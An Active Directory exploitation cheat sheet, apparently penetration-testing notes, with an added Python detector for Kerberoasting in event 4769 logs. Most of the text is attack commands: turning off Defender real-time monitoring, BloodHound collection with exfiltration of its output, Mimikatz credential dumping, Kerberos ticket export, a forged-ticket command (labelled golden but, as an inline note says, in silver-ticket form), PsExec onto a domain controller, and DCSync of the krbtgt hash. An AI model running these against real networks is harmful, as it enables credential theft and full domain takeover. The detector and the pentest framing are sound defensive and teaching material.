
Active Directory Exploitation

Tags: Active Directory, Pass-The-Hash, Kerberoasting, Mimikatz, BloodHound

AD: General Pathways

A few of the many exploitation pathways:

  • Exploiting a web-app --> lateral movement throughout the network --> domain compromise
  • Exploiting a network/service vulnerability --> lateral movement throughout the network --> domain compromise
  • Exploiting a client-side attack to compromise a user --> lateral movement --> domain compromise

Attack Methods

  • Pass-The-Hash
  • Pass-The-Ticket
  • Overpass-The-Hash
  • Kerberoasting
  • AS-REP Roasting
  • Golden Ticket
  • Silver Ticket
  • Password Spraying

AD: Enumeration and Assessment

After gaining access to a machine within an AD network, it is essential to enumerate the environment and understand the network, the domain, the machines within it, and where the compromised machine stands in relation to the environment (permissions, groups, routes to admin, etc.).

Enumeration of AD can be done in various ways. Popular and useful tools include SharpHound/BloodHound, PowerView, Impacket, and plain PowerShell.

Tools

  • Impacket suite: psexec.py, wmiexec.py, smbexec.py
  • crackmapexec
  • powerview
  • sharphound / bloodhound
  • mimikatz
  • pypykatz
  • winpeas / windows privescheck
  • ldapmonitor
  • responder
  • rubeus
  • kerbrute

PowerView Commands

Disable Monitoring:

Set-MpPreference -DisableRealtimeMonitoring $true

Get Domain Info:

Get-Domain
Get-DomainController
Get-Domain -Domain domain.local
Get-DomainController -Domain domain.local
Get-DomainUser
Get-DomainSID
Get-DomainPolicy
(Get-DomainPolicy)."SystemAccess"
Invoke-ShareFinder
Invoke-MapDomainTrust

Using BloodHound

Workflow: transfer SharpHound to the compromised host --> run the collector --> exfiltrate the resulting zip --> load the data in BloodHound --> identify valuable accounts or pathways within the domain --> use the relevant tools to exploit those accounts and move laterally

Run SharpHound:

.\sharphound.exe -c Default,GPOLocalGroup,LoggedOn --zipfilename output

Mimikatz - Find Vulnerable Accounts

privilege::debug

sekurlsa::logonPasswords

Pass the Ticket Example (requesting and exporting service tickets)

Identify service principals:

Use Get-UserSPNs.ps1

Request ticket for vulnerable SPN (PowerShell method):

Add-Type -AssemblyName System.IdentityModel

New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'SPN'

Mimikatz method (example - SPN is mssqlserver):

kerberos::purge
kerberos::list
kerberos::ask /target:mssqlserver
kerberos::list /export
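The ticket requests above land on the domain controller as Security event 4769. The following detection script is an added example, not code from the original post: it parses a constructed sample of 4769 events (the one-line field layout is an assumption; real events are EVTX/XML, and the Service field carries the service account name rather than the SPN) and flags any account that obtains RC4 (0x17) service tickets for several distinct service accounts inside a short window, which is the pattern the request-and-export steps produce.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed 4769 (Kerberos service ticket request) events, one per line.
# Field names, accounts and timestamps are assumptions for this example only.
SAMPLE_4769_EVENTS = """\
2024-05-01T09:00:01 EventID=4769 Account=alice@CORP.LOCAL Service=sql01_svc EncType=0x12 Status=0x0
2024-05-01T09:00:02 EventID=4769 Account=bob@CORP.LOCAL Service=web_svc EncType=0x12 Status=0x0
2024-05-01T09:15:00 EventID=4769 Account=jdoe@CORP.LOCAL Service=sql01_svc EncType=0x17 Status=0x0
2024-05-01T09:15:01 EventID=4769 Account=jdoe@CORP.LOCAL Service=web_svc EncType=0x17 Status=0x0
2024-05-01T09:15:02 EventID=4769 Account=jdoe@CORP.LOCAL Service=files_svc EncType=0x17 Status=0x0
2024-05-01T09:15:03 EventID=4769 Account=jdoe@CORP.LOCAL Service=sql02_svc EncType=0x17 Status=0x0
2024-05-01T09:15:04 EventID=4769 Account=jdoe@CORP.LOCAL Service=DC01$ EncType=0x17 Status=0x0
2024-05-01T11:00:00 EventID=4769 Account=carol@CORP.LOCAL Service=web_svc EncType=0x17 Status=0x0
"""

EVENT_RE = re.compile(
    r"^(?P<ts>\S+) EventID=4769 Account=(?P<account>\S+) Service=(?P<service>\S+) "
    r"EncType=(?P<enc>0x[0-9a-fA-F]+) Status=(?P<status>0x[0-9a-fA-F]+)$"
)
RC4_HMAC = 0x17  # encryption type requested by classic Kerberoasting tooling

def parse_events(text):
    """Yield (timestamp, account, service, enctype, status) per 4769 line."""
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if m:  # other event IDs and malformed lines are skipped
            yield (datetime.fromisoformat(m["ts"]), m["account"], m["service"],
                   int(m["enc"], 16), int(m["status"], 16))

def find_kerberoast_candidates(text, window=timedelta(minutes=5), min_spns=3):
    """Return {account: sorted service list} for accounts that obtained RC4
    service tickets for >= min_spns distinct service accounts within `window`.
    Computer accounts (names ending in $) are ignored to cut noise."""
    rc4_requests = defaultdict(list)  # account -> [(timestamp, service)]
    for ts, account, service, enc, status in parse_events(text):
        if enc == RC4_HMAC and status == 0 and not service.endswith("$"):
            rc4_requests[account].append((ts, service))
    hits = {}
    for account, reqs in rc4_requests.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):  # slide the window over requests
            services = {svc for ts, svc in reqs[i:] if ts - start <= window}
            if len(services) >= min_spns:
                hits[account] = sorted(services)
                break
    return hits
```

Tune `window` and `min_spns` to the environment; accounts that legitimately use RC4 (old service hosts) will otherwise raise false positives, and the better fix is to move service accounts to AES-only encryption types.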

Golden Ticket (note: with /target, /service and the service account's /rc4 hash, as below, this is the silver-ticket form of the command, scoped to one service; a golden ticket is forged from the krbtgt hash instead):

kerberos::golden /user:admin /domain:corp.com /sid:S-1-5-21-xxx-xxxx-xxxxx /target:domain.com /service:MSSQLServer /rc4:hash /ptt

Accessing the DC with Admin Privileges

PsExec64.exe \\domain-dc01 cmd.exe
pushd \\domain-dc01\c$
cd \\domain-dc01\c$

DCSync Attack:

lsadump::dcsync /user:krbtgt

lsadump::lsa /inject /name:krbtgt